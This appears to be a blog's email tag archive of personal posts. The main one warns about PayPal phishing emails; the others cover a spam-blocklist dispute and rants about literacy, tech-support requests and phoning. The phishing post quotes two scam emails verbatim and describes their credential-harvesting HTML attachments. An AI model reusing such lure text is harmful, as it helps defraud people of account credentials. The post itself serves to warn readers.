Tag Archives: email

Yet Another PayPal Phishing Attempt

Posted on by
11

This one looks, on the surface, quite convincing.

This morning, I got the following message that appeared to be from PayPal in my inbox:

Another PayPal ScamDear PayPal Customer,

You have added andrew1987 @btconnect.com as a new email address for your Paypal account.

If you did not authorize this change, check with family members and others who may have access to your account first. If you still feel that an unauthorized person has changed your email, submit the form attached to your email in order to keep your original email and restore your Paypal account.

NOTE: The form needs to be opened in a modern browser which has javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3, Opera 9)

Please understand that this is a security measure intended to help protect you and your account. We apologize for any inconvenience.

If you choose to ignore our request, you leave us no choice but to temporary suspend your account.

Sincerely, PayPal Account Review Department.

As shown in the accompanying screenshot, the message included all the usual PayPal logos and even a VeriSign Identity Protection logo. (What good is a logo like that if it’s so easily stolen and reused by scammers?) Of course, it was from an address at ppal.com (not paypal.com) and it was addressed to “Dear PayPal Customer” instead of my name. That’s a dead giveaway that the message is not real.

Of course, there was an HTML file attached. Opening the file in a text editor — not a Web browser! — showed HTML code with a JavaScript that would, among other things, collect your PayPal name, password, date of birth, and mother’s maiden name. I don’t know enough about JavaScript to figure out what would be done with this info, but I can assume it gets sent back to the folks who will then use it for identity theft.

Reading the message offers other clues that it’s fake. For example, although it’s standard for PayPal to send you an e-mail message if you add or change an e-mail account, they make a conflicting request. First, they say action is only necessary if you believe your account has been compromised. Then they tell you that if you ignore the request, they’ll suspend your account. That, of course, makes no sense.

But I’m sure that many people would fall for this. After all, it indicates that a stranger’s email has been added to their PayPal account. All the talk about Internet fraud would send a person into panic mode. He’d open the file attachment and possibly go through the process of giving away information about his own account.

You have no idea how much this pisses me off. I know people who have been scammed by emails like this. One of them is an elderly man who had a bank account tapped into and partially drained before he was able to resolve the problem.

I immediately forwarded this message to spoofs@paypal.com — the address you should forward any questionable PayPal communication to.

Please help spread the word among friends and family members who might fall for phishing attempts like this. Tell them that if they get a communication from any company they do business with, they should log into their account the usual waynot by clicking a link or opening a file attachment in the message they receive.

September 3, 2011 Update:

Thought I’d mention another version of this scam. Here’s the message that arrived today:

Dear Customer,

You sent a payment of 40.90 GBP to Mobile Top-up Online
(sales@topups247.com)

If you have questions about the shipping and tracking of your
purchased item or service, please contact the seller.

Please download the document attached to this
email to cancel or forward your purchase.
————————-

Merchant
Mobile Top-up Online
sales@topups247.com
Instructions to merchant
You haven’t entered any instructions.

Shipping address – Unconfirmed
United Kingdom
Postage details

Of course, this one came with an HTML attachment, too. It’s named “PayPal Refund.html” and, to someone who isn’t actually thinking, it might seem like something worth double-clicking to fix the perceived incorrect charge.

Don’t get scammed.

November 21, 2011 Update: They’re now doing the same thing with the name sarah@comcast.com.

Who’s Filtering Your E-Mail?

Posted on by
12

And why?

The other day I sent an e-mail message to one of my editors. Within seconds, the message was bounced back to me with this notice at the top:

Hi. This is the qmail-send program at smtpauth22.prod.mesa1.secureserver.net.
I’m afraid I wasn’t able to deliver your message to the following addresses.
This is a permanent error; I’ve given up. Sorry it didn’t work out.

<[redacted e-mail address]>:
[redacted IP address] does not like recipient.
Remote host said: 554 5.7.1 Service unavailable; Client host [64.202.165.44] blocked using dnsbl.ahbl.org; GoDaddy – Continued hosting of FreeSpeechStore hate website on 72.167.250.55, ignoring abuse
Giving up on [redacted IP address].

My first thought was WTF?

I tried again and got the same result. Then I started researching. I discovered that www.ahbl.org is the domain name for the Abusive Hosts Blocking List (AHBL), an organization that apparently maintains a list of IP address it deems as abusive. The owner or manager of the site had decided that he/she didn’t like GoDaddy.com because it hosts the conservative “hate speech” site FreeSpeechStore. (And no, I won’t link to that drivel.) My editor’s ISP was evidently using AHBL to filter incoming mail.

I e-mailed AHBL the following message using my MobileMe e-mail address (since I assumed my e-mail account hosted at GoDaddy.com would be blocked):

Unfortunately, I host a non-abusive site and my main e-mail (not this one) is at GoDaddy.com. Your site is preventing my e-mail from reaching some destinations because of some link between GoDaddy.com and freespeechstore.com.

Do you really think this is fair to me and others in the same situation?

The response I got was surprising. Someone named Brielle Bruns wrote:

Unfortunately, your provider has stated to us that they will not enforce their Terms Of Service or Acceptable Use Policy. They are turning a blind eye to abuse and harassment, which is something we can no longer ignore.

To give you an idea of why we are taking this issue as seriously as we are, one of Mr Scoville contacted the local police department, fire department, child welfare, schools, etc of one of his victims, and claimed that he and his wife were molesting their children and others from the school.

Put yourself in the victim’s shoes, and then ask yourself weather or not you’d do whatever it took to prevent anyone else from being victimized by Mr Scoville.

I repeat: WTF? My response explained exactly how I felt about the situation:

I really don’t see why I need to be dragged into this.

I agree wholeheartedly that if what you say is true, this Scoville character is an asshole and a menace to society. But let’s look at this objectively on two fronts:

– One of the founding principles of this country is free speech. If Scoville wants to create a website full of hate speech, it is his right to do so. You’re attempting to censor him by acting as a third party filtering service. Seriously: what gives you the right?

– To punish him and (assumedly) GoDaddy.com, you’re punishing ME, an innocent bystander to this whole thing. Your failure to allow my message to be received by my editor directly interferes with my ability to submit work and invoices for that work. You are cutting into my ability to make a living. WTF?

I don’t care WHY you are taking this seriously. It’s none of your business — or mine. Let the police handle it — that’s what our tax dollars pay them to do.

I’ve issued a complaint to my editor and asked him to contact his ISP or system administrator — whoever is using your services. I’ll forward this message to him as well. You are stepping beyond your legal rights in this. I’m hoping my editor complains and your service is no longer utilized by his company or ISP.

The response I got back picked apart my e-mail message paragraph by paragraph, attempting to justify the site’s action against GoDaddy just because it hosts some wacko’s Web site. Honestly I didn’t even bother reading it. It was clear that Bruns was just as wacko as the person he/she was trying to harm — by harming people like me. Clearly, I was wasting my time communicating with this person.

So I wrote to the editor I’d been trying to contact, this time using my MobileMe account. I’d already updated him about what was going on. Now I decided to make a formal request:

I respectfully request that you ask your ISP or system administrator to stop using the services of Abusive Hosts Blocking Service. They are preventing me from communicating with you on my primary e-mail address, dragging us into some sort of war they have with GoDaddy.com, and simply do not care how much they inconvenience innocent bystanders.

The fact that your ISP or System Administrator utilizes a service that would do such a thing is unthinkable to me.

When I didn’t get a response, I followed it up with this:

Seriously…you need to do something about this. Whoever authorized use of this blocking organization is preventing me — and possibly your advertisers! — from contacting you. THIS IS DEFINITELY A PROBLEM ON YOUR END. Tell your ISP or System Administrator to shut that service off.

The woman who runs it is on some kind of holy crusade and she’s been very rude to me in our e-mail exchanges. I’ve lost an hour of my day troubleshooting this issue, only to be frustrated by her holier-than-thou attitude.

The day ended. The editor is back east, so I didn’t really expect immediate action. In the morning, however, I had the result I wanted. My editor wrote:

Thanks for letting me know what you’ve learned. I’ll be discussing it with my boss today and we’ll figure out what the next step will be.

I later was CCed on an e-mail message from my editor’s boss to the company’s ISP:

Below is a dialogue between one of our writers and someone named Brielle Bruns from an outfit called “The Summit Open Source Development Group” which seems to be at the root of our problem receiving some business critical e-mails from Godaddy based addresses.

In addition to blocking e-mails from our writer, I have had one of my attorneys e-mails blocked and missed an important deadline as a result. I have no idea how many e-mails have been blocked from our subscribers or [redacted] customers but I have to believe the number is sizable.

As far as any of my businesses are concerned, please IMMEDIATELY STOP using what ever “service” is being provided Brille Burns’ outfit. What ever dispute she or her group has with this Scottville guy, it nothing to do with us and her organization is negatively impacting our business and customers.

Please take care of this immediately.

I replied with a thank you message to my editor and his boss. The block was soon lifted and I could again begin using my regular e-mail address to communicate with my editor.

One of the subsequent messages flying back and forth between the parties included this comment:

PS: We just found this: from 2.5 years ago ref: “Brian J. Bruns convicted felon and owner of www.ahbl.org Abusive Hosts Blocking List AHBL” http://criminal-brian-j-bruns.blogspot.com/

The link is to a Blogger blog that purports to share documents about this person’s felony conviction and sexual deviations. (I still can’t believe the kind crap out there on the Web.) It looks pretty real, but I’m a skeptic on these things and wouldn’t be the least bit surprised to learn that it was Brin’s nemesis, Scoville, slinging dirt. Seriously: some people need to get a life.

When the hubbub had died down, I e-mailed the ISP representative. I had his e-mail address from the message initially to him that I was CCed on. I told him I was interested in blogging about this and asked a few questions. He replied that he’d have to ask his boss about some of the answers, but he did state the following:

I can tell you, though, in regards #3, we were using the service entirely for spam prevention. We use a number of different services for spam prevention, and had no knowledge of their political agenda. As soon as we found out what was going on with this service, which was, coincidentally, shortly before [redacted] e-mailed us, we stopped using this service. I am very sorry for the problems this caused, and we would never knowingly use a service that had a political agenda like this.

Which begs the questions:

  • What “service” is your ISP using to combat spam?
  • How many important, legitimate e-mail messages have you missed because of a situation like this?
  • What gives organizations the right to classify an IP address as abusive or harmful, regardless of who else might be using it via shared hosting or e-mail?

If you or your ISP is using AHBL, stop now. The company obviously has a political agenda that does not consider the negative aspects of its actions. Why would anyone use a company like this to filter e-mail? Wouldn’t you rather get a little spam than miss out on important communications from friends, family, and business associates? I would!

As for me, I’d already begun moving my Web sites and e-mail addresses away from GoDaddy.com — but for other, service-related reasons. They still have not provided a satisfactory explanation to me about what’s going on with the “hate site.” This just confirms that my switch to a new ISP was long overdue.

On Limited Literacy

Posted on by
7

Is it wrong to be prejudiced against people who don’t even try to be literate?

I mentioned in my blog that I sometimes allow rated helicopter pilots to fly my aircraft on ferry flights for my flight cost. This is a substantial savings over what they’d pay to rent an aircraft to build time. In addition, they get the chance to fly a long cross-country flight (usually around 10 hours over two days) with an experienced pilot.

I get e-mails from people who are interested in this opportunity. The most recent arrived yesterday:

Yes sir i was intrested in biulding some time i am a commercial rated pilot with 250hr most in a robinson 22 i really need this chance to fly thank you for your time.

Although he managed to capitalize the first letter of the first word and put a period after the last word everything in between is a mess. Spelling? Punctuation? Is this what our schools are churning out?

Keep in mind that he sent me this message using the contact form on my Web site. A Web site that displays my name in the browser’s address bar when viewed. A web site that includes my name, bio, and other information in all kinds of places. Yet he addressed me as “sir.” I figured he’d somehow missed that I was a woman.

Still, the whole message put me in a foul mood. My response got to the point:

Do you have an R44 endorsement?

Maria

Without an R44 endorsement and 10 hours of flight time in R44s, you cannot fly an R44 with a passenger (even me) aboard. No exceptions.

Note that I included my name, just in case he really did miss it the first time.

His reply:

no sir im afraid i do not have it i would be willing to get one if you could let me know what it would take to get one thanks for your time

He didn’t even bother trying to get capitalization or punctuation right this time. Perhaps his shift key broke.

And I wasn’t about to let him get away with “sir” again. I replied:

First of all, I’m not a “sir.” Maria is a woman’s name. You sent an e-mail message to the woman who owns and operates the company and flies the aircraft.

If you don’t have an R44 endorsement, you cannot fly the aircraft. I’m sorry. If you want to get an R44 endorsement, talk to a flight school that operates R44s.

Maria

I’m bugged by this exchange. I’m bugged that someone bordering on illiterate — or too damn lazy to even try to get his spelling, punctuation, or grammar right — has the nerve to ask if he can fly my aircraft. There’s no way in hell I’d let anyone who communicates like that at the controls.

Being a commercial pilot is more than just taking flight lessons and getting the appropriate ratings. If this guy can’t write, how do I know he can read? That he understands the training materials he was given? That he took the time to read the pilot operating manual?

You might argue that he must have because he passed a written and oral test — two of each, in fact — to get as far as he did. But how do I know the quality of his CFI or pilot examiner? Or in the case of sheer laziness, if he’s too lazy to create two short e-mail messages written in proper grammar, why should I do him any favors at all? Frankly, I think even responding to him was going beyond the call of duty here.

Am I wrong to believe that written communication should be created with some semblance to proper grammar? Am I wrong to thumb my nose at people who fail to meet even the lowest tests of their ability to communicate in writing by composing two or three complete sentences?

Is this what our schools are churning out?

This is the Kind of Stuff I Get in E-Mail

Posted on by
Comment

Come on folks! Get a clue!

I found this message in my spam folder this afternoon:

I have xp, I have been using microsft exscel 2007 with no problems until today
the spread sheet prints with wavy lines
cells are wavy, it is not the printer because when I go back and print old spread sheets it is fine
thank you for your help

I have not edited this other than to remove the sender’s name. I had never before been in contact with the sender.

Yes, I know I’ve written books about Excel, including Excel 2007. But does that make me the go-to person for all Excel questions? Like I have nothing better to do than sit at my desk and wait for Excel user questions to come in so I can answer them?

My Contact page clearly indicates that I do not answer questions about my books via e-mail. But this isn’t even a question about my books. This is a technical support question about a printing problem. How am I supposed to know what this person — who is borderline illiterate — did in Excel to get wavy cell lines?

This message is good for one thing, however: it gave me fodder for a rant about the kind of crap I find in my e-mail in box.

Sheesh.

Stop Being Too Cheap to Pick Up the Damn Phone

Posted on by
7

It’s 2010, not 1957.

TelephoneYeah, I know. In the old days, calling a phone number outside your area code would likely cost you a few bucks for a few minutes. “Long distance” phone calls were pricey, often 25¢ or more per minute. Cost conscious folks had no interest in following up on a vendor or service by calling in. Thus, toll-free (originally “800” numbers in the U.S.) were born. By the 1990s, they’d run out of area code 800 phone numbers and added 866 and 877.

Sometime before that, however, e-mail began its rise to popularity. Why call someone on the phone when you could e-mail them for free? The result: spammers and people who seem content to cast their queries to the Internet winds, hoping an intended recipient receives them and responds sometime before the end of the week.

As phone companies began competing for our business, phone rates dropped. When I ran my BBS back in the late 1980s and early 1990s, I was thrilled to find a calling plan with unlimited long distance for only 10¢ a minute. Then 6¢. Then 5¢. This meant I could pick up my FidoNET message groups nightly for only a few dollars a month. The added benefit: I could call my mother or sister, in the next state, and talk to them for 20 minutes for only a buck.

Time marched on. Cell phones began their rise. Cell phone service providers started competing for our business, offering better and better rate plans. I pay a flat fee every month. I get free calls on weekends and non-peak times. I get free calls to any other cell number with the same carrier as mine. I get free calls to the five phone numbers I specify that aren’t with my cellular provider. I get 900 peak minutes a month. Yes, I realize that other providers have other plans that are equally good, if not better. The point is, if you have a cell phone with any decent calling plan, there’s no such thing as “long distance” anymore — at least not within the U.S.

So why the hell do people whine and complain when they can’t contact a person or organization via e-mail? Why don’t they just pick up the damn phone and dial the number that’s provided?

Here are three examples of where I’m seeing old-fashioned thinking about making a “long distance” phone call:

  • I recently designed a brochure for Flying M Air’s Moonlight Dinner Tour, which takes people to the excellent Anzio Landing restaurant at Falcon field. The brochures were designed to be distributed at Anzio to their existing customers. Fortunately, I sent a sample of the brochure to the owner/manager before having them printed. I included my company’s phone number, which is in the 928 (northern Arizona) area code. The manager asked, “Don’t you have a local number for people to call?” I had to grab a number in the 602 (Phoenix) area code from Google Voice, set it up to forward to my phone, and add it the brochure.
  • At least once a week, I get an e-mail message from a helicopter pilot looking for a job. They visit Flying M Air’s Web site and home in on the Contact Us page. The page includes the company phone number — seriously, how else would you make a reservation? — but they opt for the contact form, which sends me an e-mail message. So rather than taking 15 to 30 seconds of their time calling to ask if there are any jobs available, they waste 5 to 10 minutes of their time composing an e-mail message that’s supposed to impress me just to ask me to call them and request more information or an interview. Guess what? I’m not impressed. (I’ve since added a note right above that form telling them we’re not hiring. It’ll be interesting to see how many job seekers ignore that.)
  • A recent comment on wickenburg-az.com, a Web site I manage, complained that an organization seeking support and new members had not provided an e-mail address. It had, however, provided a phone number. I pointed this out in a reply to the comment, hoping he’d stop whining and contact the organization using the method they preferred.

Come on, folks! It’s 2010! Telephone communication is cheaper than ever. It also remains the fastest way to conduct a two-way conversation with someone else.

Need information? Stop wasting time with e-mail and pick up the damn phone!